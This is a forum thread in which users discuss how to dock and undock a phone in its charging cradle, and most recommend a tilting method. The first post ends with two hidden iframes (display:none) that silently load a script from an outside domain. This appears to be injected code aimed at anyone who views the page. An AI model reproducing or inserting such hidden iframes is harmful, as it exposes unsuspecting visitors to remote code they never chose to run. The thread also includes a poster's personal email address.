+ Reply to Thread

Thread: Using cradle

Unhappy Using cradle

Howdy!

I just got my phone (after 2 years with a Palm) a few days ago and I've got a question about the cradle.

It seems VERY difficult to remove the phone from the cradle. I always wind up pulling it slightly forward to unsnap it from the little clips and then pulling it up. However, I hate doing this because I keep thinking I'm going to snap off the actual docking port on the cradle. I'm about ready to snip off the little clips.

How does everyone else undock their phone? Do I just have a weird cradle?

Many thanks. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Unhappy Did I do something wrong?

Hmmm, 9 views and no replys. I assume everyone's got a cradle (to comment on how they take theirs out) so I must have messed up my post somehow. Can anyone e-mail me to let me know what I did wrong?

rzrseg@hotmail.com

Many thanks.

Dan
    Hey, guy, relax. It's only been a half hour between your posts.

I put my i300 into it's cradle the same way I always had to with my 3500 and 6100: I place the bottom in the correct position and lean the phone back into the clips. Works every time. Acually, with the larger port on the bottom it works better than it did with my 3500, where I would get the Orange Blinky Light about one time out of five (which indicates that I've failed to demonstrate my ability to place a phone in it's desktop charger properly). I've never gotten the OBL on my i300. I simply reverse the process to remove it.

Excellent, I didn't do anything wrong!

So that's the way it's supposed to work? Hmm, seems like a questionable design but if it works, why mess with it. Thanks for the "put it on the dock then lean it back method". I was placing it high then sliding it down into the port.

Thanks again.

What I Do

I'll tell you what I do...

I don't slide the phone in and out of the cradle.

I tilt it in and tilt in out. In other words I pull it slightly away from the back of the cradle as I gently lift it out.

I, as well, use the "tilt method." I understand
    your concern with damaging the device yet, this
    process seems easier on the ohone than
    pulling it straight up.

Originally posted by mjorange
    I, as well, use the "tilt method." I understand
    your concern with damaging the device yet, this
    process seems easier on the ohone than
    pulling it straight up.
    Okay then, tilting it is. It appears to work if I just place it on the dock without locking it into place. I think I may just do it like that. The connection seems pretty tight (electrically that is).